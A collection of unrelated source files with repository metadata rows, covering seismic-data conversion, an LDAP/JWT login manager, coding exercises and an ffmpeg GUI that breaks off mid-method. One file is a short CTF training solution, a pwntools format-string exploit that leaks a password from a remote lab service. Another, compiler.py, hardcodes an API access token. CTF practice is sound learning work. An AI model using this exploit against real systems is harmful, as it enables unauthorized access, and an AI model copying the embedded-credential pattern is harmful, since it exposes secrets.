for f in TRACE_FIELDS
],
)
with self._tiledb_array(headers_uri, header_schema) as tdb:
self._fill_headers(tdb)
data_uri = str(uri / "data")
if tiledb.object_type(data_uri) != "array":
samples = len(self.segy_file.samples)
sample_dtype = self.segy_file.dtype
sample_size = sample_dtype.itemsize
dims = list(self._get_dims(sample_size * samples))
dims.append(
tiledb.Dim(
name="samples",
domain=(0, samples - 1),
dtype=dims[0].dtype,
tile=np.clip(self.tile_size // sample_size, 1, samples),
)
)
data_schema = tiledb.ArraySchema(
domain=tiledb.Domain(*dims),
sparse=False,
attrs=[
tiledb.Attr("trace", sample_dtype, filters=(tiledb.LZ4Filter(),))
],
)
with self._tiledb_array(data_uri, data_schema) as tdb:
self._fill_data(tdb)
@contextmanager
def _tiledb_array(
self, uri: str, schema: tiledb.ArraySchema
) -> Iterator[tiledb.Array]:
tiledb.Array.create(uri, schema)
with tiledb.open(uri, mode="w") as tdb:
yield tdb
tiledb.consolidate(uri, config=self.config)
tiledb.vacuum(uri, config=self.config)
@abstractmethod
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
"""Get the tiledb schema dimensions"""
@abstractmethod
def _fill_headers(self, tdb: tiledb.Array) -> None:
tdb.meta["__text__"] = b"".join(self.segy_file.text)
for k, v in self.segy_file.bin.items():
tdb.meta[str(k)] = v
@abstractmethod
def _fill_data(self, tdb: tiledb.Array) -> None:
tdb.meta["sorting"] = (
self.segy_file.sorting or segyio.TraceSortingFormat.UNKNOWN_SORTING
)
tdb.meta["samples"] = self.segy_file.samples.tolist()
tdb.meta["dt"] = segyio.tools.dt(self.segy_file, fallback_dt=0)
class UnstructuredSegyFileConverter(SegyFileConverter):
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
traces = self.segy_file.tracecount
return [
tiledb.Dim(
name="traces",
domain=(0, traces - 1),
dtype=np.uint64,
tile=np.clip(self.tile_size // trace_size, 1, traces),
),
]
def _fill_headers(self, tdb: tiledb.Array) -> None:
super()._fill_headers(tdb)
traces = self.segy_file.tracecount
get_header = self.segy_file.header
step = np.clip(self.tile_size // TRACE_FIELDS_SIZE, 1, traces)
for sl in iter_slices(traces, step):
headers = [
np.zeros(sl.stop - sl.start, dtype) for dtype in TRACE_FIELD_DTYPES
]
for i, field in enumerate(get_header[sl]):
getfield, buf = field.getfield, field.buf
for key, header in zip(TRACE_FIELD_ENUMS, headers):
v = getfield(buf, key)
if v:
header[i] = v
tdb[sl] = dict(zip(TRACE_FIELD_NAMES, headers))
def _fill_data(self, tdb: tiledb.Array) -> None:
super()._fill_data(tdb)
raw_trace = self.segy_file.trace.raw
traces = self.segy_file.tracecount
step = np.clip(self.tile_size // self.segy_file.trace_size, 1, traces)
for sl in iter_slices(traces, step):
tdb[sl] = raw_trace[sl]
class StructuredSegyFileConverter(SegyFileConverter):
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
dtype = np.uintc
slow_lines = len(self.segy_file.slow_lines)
if self.segy_file.is_inline:
fast_dim, slow_dim = "ilines", "xlines"
else:
fast_dim, slow_dim = "xlines", "ilines"
return [
tiledb.Dim(
name=fast_dim,
domain=(0, len(self.segy_file.fast_lines) - 1),
dtype=dtype,
tile=self._fast_tile(trace_size),
),
tiledb.Dim(
name=slow_dim,
domain=(0, slow_lines - 1),
dtype=dtype,
tile=slow_lines,
),
tiledb.Dim(
name="offsets",
domain=(0, len(self.segy_file.offsets) - 1),
dtype=dtype,
tile=1,
),
]
def _fill_headers(self, tdb: tiledb.Array) -> None:
super()._fill_headers(tdb)
step = self._fast_tile(TRACE_FIELDS_SIZE)
fast_lines = self.segy_file.fast_lines
slow_lines = self.segy_file.slow_lines
fast_headerline = self.segy_file.fast_headerline
for offset_idx, offset in enumerate(self.segy_file.offsets):
for sl in iter_slices(len(fast_lines), step):
slice_lines = fast_lines[sl]
cubes = [
np.zeros((len(slice_lines), len(slow_lines)), dtype)
for dtype in TRACE_FIELD_DTYPES
]
for i, line in enumerate(slice_lines):
for j, field in enumerate(fast_headerline[line, offset]):
getfield, buf = field.getfield, field.buf
for key, cube in zip(TRACE_FIELD_ENUMS, cubes):
v = getfield(buf, key)
if v:
cube[i, j] = v
tdb[sl, :, offset_idx] = dict(zip(TRACE_FIELD_NAMES, cubes))
def _fill_data(self, tdb: tiledb.Array) -> None:
super()._fill_data(tdb)
for key in "ilines", "xlines", "offsets":
tdb.meta[key] = getattr(self.segy_file, key).tolist()
step = self._fast_tile(self.segy_file.trace_size)
fast_lines = self.segy_file.fast_lines
get_line = self.segy_file.fast
for offset_idx, offset in enumerate(self.segy_file.offsets):
for sl in iter_slices(len(fast_lines), step):
cube = np.stack([get_line[i, offset] for i in fast_lines[sl]])
tdb[sl, :, offset_idx] = cube
def _fast_tile(self, trace_size: int) -> int:
num_fast, num_slow = map(
len, (self.segy_file.fast_lines, self.segy_file.slow_lines)
)
return int(np.clip(self.tile_size // (num_slow * trace_size), 1, num_fast))
def iter_slices(size: int, step: int) -> Iterator[slice]:
r = range(0, size, step)
yield from map(slice, r, r[1:])
yield slice(r[-1], size)
| 37.054945 | 87 | 0.59223 | 8,693 | 0.859332 | 871 | 0.086101 | 1,661 | 0.164195 | 0 | 0 | 257 | 0.025405 |
5e36244123ee5c6940be37309dff373ccc4d49dc | 40 | py | Python | src/maggma/api/__init__.py | materialsproject/maggflow | 9f8d7a0865ec13212a3fd00d5edebd3cb7b40e7d | [
"BSD-3-Clause-LBNL"
] | 15 | 2017-06-15T16:35:23.000Z | 2022-03-05T09:57:02.000Z | src/maggma/api/__init__.py | materialsproject/maggflow | 9f8d7a0865ec13212a3fd00d5edebd3cb7b40e7d | [
"BSD-3-Clause-LBNL"
] | 573 | 2017-06-14T15:54:27.000Z | 2022-03-31T23:20:55.000Z | src/maggma/api/__init__.py | rkingsbury/maggma | 53def068df1cb410bfe91e7045903997813e173a | [
"BSD-3-Clause-LBNL"
] | 28 | 2017-06-14T20:50:26.000Z | 2022-03-04T16:56:40.000Z | """ Simple API Interface for Maggma """
| 20 | 39 | 0.675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.975 |
5e38493f0fa872e04c4bfac3ddb969b05f7e7104 | 522 | py | Python | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | import colorsys
palette_size = 80
palette = []
for i in range(palette_size):
t = i / (palette_size - 1)
h = t * (60 / 360)
l = t
s = 1.0
color = colorsys.hls_to_rgb(h, l, s)
color = tuple(map(lambda x: round(x * 63), color))
palette.append(color)
with open('palette.asm', 'w', newline='\n') as f:
f.write('palette:\n')
for color in palette:
f.write('\tdb ');
color = map(lambda x: '0x{:02X}'.format(x), color)
f.write(', '.join(color))
f.write('\n')
| 22.695652 | 58 | 0.547893 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 57 | 0.109195 |
5e3a9ab4118c0f0c1c0188378ff8afd2c67ece34 | 350 | py | Python | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 30 | 2017-09-05T14:29:30.000Z | 2022-03-20T01:51:29.000Z | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | null | null | null | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 7 | 2018-03-15T10:07:43.000Z | 2020-12-14T09:36:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11007
r = remote(host,port)
password_addr = 0x804a048
r.recvuntil("?")
r.sendline(p32(password_addr) + "#" + "%10$s" + "#" )
r.recvuntil("#")
p = r.recvuntil("#")
password = u32(p[:4])
r.recvuntil(":")
r.sendline(str(password))
r.interactive()
| 15.909091 | 53 | 0.625714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.257143 |
5e3b823d0f87912b114dc8c0fa28049792efe0c4 | 675 | py | Python | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 548 | 2015-01-04T23:10:59.000Z | 2022-03-31T07:34:28.000Z | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 108 | 2015-01-05T13:27:29.000Z | 2022-03-01T09:21:24.000Z | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 170 | 2015-01-12T19:14:51.000Z | 2022-02-27T17:44:30.000Z | #!/usr/bin/env python
import sys
from fitparse.records import Crc
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
class RecordsTestCase(unittest.TestCase):
def test_crc(self):
crc = Crc()
self.assertEqual(0, crc.value)
crc.update(b'\x0e\x10\x98\x00(\x00\x00\x00.FIT')
self.assertEqual(0xace7, crc.value)
# 0 must not change the crc
crc.update(0)
self.assertEqual(0xace7, crc.value)
def test_crc_format(self):
self.assertEqual('0x0000', Crc.format(0))
self.assertEqual('0x12AB', Crc.format(0x12AB))
if __name__ == '__main__':
unittest.main()
| 22.5 | 56 | 0.645926 | 464 | 0.687407 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.162963 |
eaa369f6384c7d274e6bec1f3e2e2cfe6baf997b | 1,420 | bzl | Python | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_file")
BAZEL_INSTALLER = struct(
revision = "4.0.0",
sha256 = "bd7a3a583a18640f58308c26e654239d412adaa833b6b6a7b57a216ab62fabc2",
)
DEBS_TARBALL = struct(
revision = "1608132805",
sha256 = "7ed2d4869f19c11d8c39345bd75f908a51410bf4e512e9fc368ad0c2bbf43e28",
)
def deps():
"""Download deps"""
excludes = native.existing_rules().keys()
if "ubuntu1604_bazel_installer" not in excludes:
http_file(
name = "ubuntu1604_bazel_installer",
downloaded_file_path = "bazel-installer.sh",
sha256 = BAZEL_INSTALLER.sha256,
urls = [
"https://releases.bazel.build/" + BAZEL_INSTALLER.revision + "/release/bazel-" + BAZEL_INSTALLER.revision + "-installer-linux-x86_64.sh",
"https://github.com/bazelbuild/bazel/releases/download/" + BAZEL_INSTALLER.revision + "/bazel-" + BAZEL_INSTALLER.revision + "-installer-linux-x86_64.sh",
],
)
if "ubuntu1604_bazel_debs" not in excludes:
http_file(
name = "ubuntu1604_bazel_debs",
downloaded_file_path = DEBS_TARBALL.revision + "_bazel_debs.tar",
sha256 = DEBS_TARBALL.sha256,
urls = [
"https://storage.googleapis.com/layer-deps/ubuntu1604/bazel/debs/" + DEBS_TARBALL.revision + "_bazel_debs.tar",
],
)
| 38.378378 | 170 | 0.64507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 618 | 0.435211 |
eaa3714aff832e686ae4830447a5096de12ce12d | 143 | py | Python | Python/Sets/Set.add().py | pavstar619/HackerRank | 697ee46b6e621ad884a064047461d7707b1413cd | [
"MIT"
] | 61 | 2017-04-27T13:45:12.000Z | 2022-01-27T11:40:15.000Z | Python/Sets/Set.add().py | fahad0193/HackerRank | eb6c95e16688c02921c1df6b6ea613667a251457 | [
"MIT"
] | 1 | 2017-06-24T14:16:06.000Z | 2017-06-24T14:16:28.000Z | Python/Sets/Set.add().py | fahad0193/HackerRank | eb6c95e16688c02921c1df6b6ea613667a251457 | [
"MIT"
] | 78 | 2017-07-05T11:48:20.000Z | 2022-02-08T08:04:22.000Z | if __name__ == '__main__':
n = int(input())
s = set()
for i in range (n):
s.add(input())
print((len(s)))
| 15.888889 | 26 | 0.426573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.06993 |
eaa454aeb2637a676c1e50bb9a3b6f2eb3e45e6f | 87 | py | Python | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from sakf.sakf import main
if __name__ == '__main__':
main() | 17.4 | 26 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 33 | 0.37931 |
eaa5e7d7d957b71c8f9536bbb10b0314303c12f5 | 2,741 | py | Python | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | 2 | 2019-10-26T03:49:51.000Z | 2019-10-27T06:48:07.000Z | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | null | null | null | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | 2 | 2021-07-18T09:17:50.000Z | 2022-03-08T05:03:31.000Z | from sphere_engine import CompilersClientV4
from sphere_engine.exceptions import SphereEngineException
import time
# define access parameters
accessToken = '77501c36922866a03b1822b4508a50c6'
endpoint = 'dd57039c.compilers.sphere-engine.com'
# initialization
client = CompilersClientV4(accessToken, endpoint)
# API usage
# source = 'function f() {return "hello"; } print(f());' # Javascript
# compiler = 112 # Javascript
source = 'print("hello world please work!!!!!")' # Python
compiler = 116 # Python
input = '2017'
# Set default value for response
response = None
# Sends the submission and checks for errors in sending the submission
try:
response = client.submissions.create(source, compiler, input)
# response['id'] stores the ID of the created submission
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 402:
print('Unable to create submission')
elif e.code == 400:
print('Error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
# Set default value for response data
responseData = None
print("Code submitted is: ")
print(source)
print("Submission ID is: " + str(response.get('id')))
print()
# Try getting submission ID and check if there are errors
try:
client.submissions.get(response.get('id'))
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the submission is forbidden')
elif e.code == 404:
print('Submission does not exist')
# Uses submission ID, and checks every x seconds to see if query has been 'accepted' (finished processing)
while client.submissions.get(response.get('id')).get('result').get('status').get('name') != 'accepted' :
responseData = client.submissions.get(response.get('id'))
print(responseData) # for test purposes
print("Status is: " + responseData.get('result').get('status').get('name'))
time.sleep(5)
print("Status is: " + client.submissions.get(response.get('id')).get('result').get('status').get('name'))
print()
rawresponse = None
# Get the output of the query
try:
rawresponse = client.submissions.getStream(response.get('id'), 'output')
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the submission is forbidden')
elif e.code == 404:
print('Non existing resource, error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
elif e.code == 400:
print('Error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
print("Output returned is: ")
print(rawresponse) | 33.426829 | 122 | 0.690259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,266 | 0.461875 |
eaa6140f555dcb9999992526db8818c254ad7559 | 84 | py | Python | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | import tkinter as tk
import gui
wd = tk.Tk()
gui = gui.GUI(wd)
wd.mainloop() | 12 | 21 | 0.630952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eaa6e1abc664210c2d20b6da218369d841465733 | 3,306 | py | Python | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 490 | 2019-01-16T12:57:22.000Z | 2022-03-26T14:13:26.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 147 | 2019-01-23T13:22:42.000Z | 2022-03-30T11:14:08.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 91 | 2019-03-11T10:37:50.000Z | 2022-03-28T16:41:32.000Z | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user | 42.384615 | 98 | 0.667272 | 3,014 | 0.911676 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.078342 |
eaa6e6b11cc89e6f7aeab32dc3e25a5307983316 | 1,198 | py | Python | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | import os
import torch
import numpy as np
import torch.nn as nn
import matplotlib.pyplot as plt
def get_param_matrix(model_prefix, model_dir):
"""
Grabs the parameters of a saved model and returns them as a matrix
"""
# Load and combine the parameters
param_matrix = []
for file in os.listdir(model_dir):
if file.startswith(model_prefix):
model_path = os.path.join(model_dir, file)
state_dict = torch.load(model_path)
# Grab all params in state dict
params = [state_dict[param].data.float() for param in state_dict]
# Reshape to one long parameter vector
params = nn.utils.parameters_to_vector(params)
param_matrix.append(params.cpu().numpy())
params_matrix = np.array(param_matrix)
return params_matrix
def plot_trajectory(projected_params):
# Separate components
x = projected_params[:, 0]
y = projected_params[:, 1]
z = projected_params[:, 2]
# Creating figure
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
# Creating plot
ax.scatter3D(x, y, z, color="green")
plt.title("Projected Learning Trajectory")
| 31.526316 | 79 | 0.658598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 281 | 0.234558 |
eaabcde0a0bdb029d9b18b138be58cc64d90cc9c | 1,103 | py | Python | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | """
Functions to anglicize integers in the range 1..19
This is a simple example for now. We will see a more complex
version of this later.
Author: Walker M. White
Date: March 30, 2019
"""
def anglicize(n):
"""
Returns: English equiv of n.
Parameter: the integer to anglicize
Precondition: n in 1..19
"""
if n == 1:
return 'one'
elif n == 2:
return 'two'
elif n == 3:
return 'three'
elif n == 4:
return 'four'
elif n == 5:
return 'five'
elif n == 6:
return 'six'
elif n == 7:
return 'seven'
elif n == 8:
return 'eight'
elif n == 9:
return 'nine'
elif n == 10:
return 'ten'
elif n == 11:
return 'eleven'
elif n == 12:
return 'twelve'
elif n == 13:
return 'thirteen'
elif n == 14:
return 'fourteen'
elif n == 15:
return 'fifteen'
elif n == 16:
return 'sixteen'
elif n == 17:
return 'seventeen'
elif n == 18:
return 'eighteen'
# n = 19
return 'nineteen'
| 19.017241 | 61 | 0.507706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 458 | 0.415231 |
eaac2ee80b3fe871703042e08987e0174fc49d74 | 919 | py | Python | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | 4 | 2020-07-24T01:59:50.000Z | 2021-07-24T15:14:08.000Z | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
import sys
from collections import defaultdict
sys.setrecursionlimit(100000)
def check(node, adjacency, seen):
seen[node] = True
for vertex in adjacency[node]:
if not seen[vertex]:
check(vertex, adjacency, seen)
n = int(input())
k = int(input())
edges = defaultdict(list)
for _ in range(k):
a, b = list(map(int, input().strip().split()))
edges[a].append(b)
edges[b].append(a)
x = int(input())
count = 0
visited = defaultdict(bool)
visited[x] = True
for i in range(n):
if not visited[i]:
count += 1
check(i, edges, visited)
print('Connected' if count == 1 else 'Not Connected')
| 22.975 | 94 | 0.634385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.326442 |
eaaca7839f6bb2b2e2924a78a429e6572176117e | 361 | py | Python | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def distanceK(self, root, target, K):
"""
:type root: TreeNode
:type target: TreeNode
:type K: int
:rtype: List[int]
"""
| 21.235294 | 41 | 0.509695 | 188 | 0.520776 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.770083 |
eaad23f2b13bd298772ecacc2f6ab37c85b8ea24 | 64 | py | Python | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | 1 | 2020-12-18T21:16:05.000Z | 2020-12-18T21:16:05.000Z | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | null | null | null | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | null | null | null | """Contiain the version of the package"""
__version__ = "0.2.0"
| 21.333333 | 41 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 48 | 0.75 |
eaae0faf13f42080f43de9f7c7d0bd4f497fa5d8 | 13,343 | py | Python | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 2 | 2021-12-12T13:26:06.000Z | 2022-03-03T16:14:53.000Z | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 5 | 2019-03-01T07:08:46.000Z | 2019-04-28T07:32:42.000Z | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 2 | 2017-12-13T13:13:52.000Z | 2019-03-13T20:08:15.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import subprocess
import re
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from ui_widget import Ui_Form
# ffmpeg -y -r 10 -i anim%4d.png -vf fps=25 -c:v libx264 -crf 18 -pix_fmt yuv420p video.mp4
class Window(QWidget, Ui_Form):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.setupUi(self)
self.input_fps_lineEdit.setValidator(QIntValidator(0, 1000))
self.output_fps_lineEdit.setValidator(QIntValidator(0, 1000))
self.quality_Slider.setTickPosition(QSlider.TicksBothSides)
self.quality_Slider.setTickInterval(1)
self.quality_Slider.valueChanged.connect(
lambda i: QToolTip.showText(QCursor.pos(), "%d" % i))
# stdio redirection
self.stdout, sys.stdout = sys.stdout, self
# self.stderr, sys.stderr = sys.stderr, self
self.buf = ''
# images
self.pix = []
# read settings
settings = QSettings()
self.restoreGeometry(settings.value("Geometry", self.saveGeometry()))
self.ffmpegfolder_lineEdit.setText(settings.value("ffmpegfolder", ""))
self.workspace_lineEdit.setText(settings.value("workspace", ""))
self.filenames_lineEdit.setText(
settings.value("filenames", "anim%4d.png"))
self.outdir_lineEdit.setText(settings.value("outdir", ""))
self.outname_lineEdit.setText(
settings.value("outname", "video.mp4"))
self.input_fps_lineEdit.setText(settings.value("input_fps", "10"))
self.output_fps_lineEdit.setText(settings.value("output_fps", "25"))
self.quality_Slider.setValue(int(settings.value("quality", 19)))
iconfile = os.path.join(os.path.dirname(
__file__), '..', '..', 'ico', 'boomy-forward.png')
self.setWindowIcon(QIcon(iconfile))
def on_play_Button_pressed(self):
print("running ffplay...")
self.runPRG("ffplay")
def on_probe_Button_pressed(self):
print("running ffprobe...")
self.runPRG("ffprobe")
def runPRG(self, pname):
exeffplay = self.getExe(pname)
if not exeffplay:
QMessageBox.critical(
self, 'Error', '%s does not exist/work!\nCheck ffmpeg path.' % pname)
return
cmd = []
cmd.append(exeffplay)
outfile = os.path.join(self.outdir_lineEdit.text(),
self.outname_lineEdit.text())
if not os.path.isfile(outfile):
QMessageBox.critical(
self, 'Error', 'The video has not been generated yet!\n%s does not exist' % outfile)
return
cmd.append(outfile)
print('\t', cmd)
try:
retcode = subprocess.call(cmd)
print("\tretcode =", retcode)
except Exception as e:
print(e)
def on_check_Button_pressed(self):
print("folders:")
for p, f in [('ffmpeg', self.ffmpegfolder_lineEdit.text()),
('workspace', self.workspace_lineEdit.text()),
('output', self.outdir_lineEdit.text())]:
print("\t.", p, end=' ')
if not f:
print("empty")
if os.path.isdir(f):
print("exists!")
else:
print("doesn't exist!")
print("programs:")
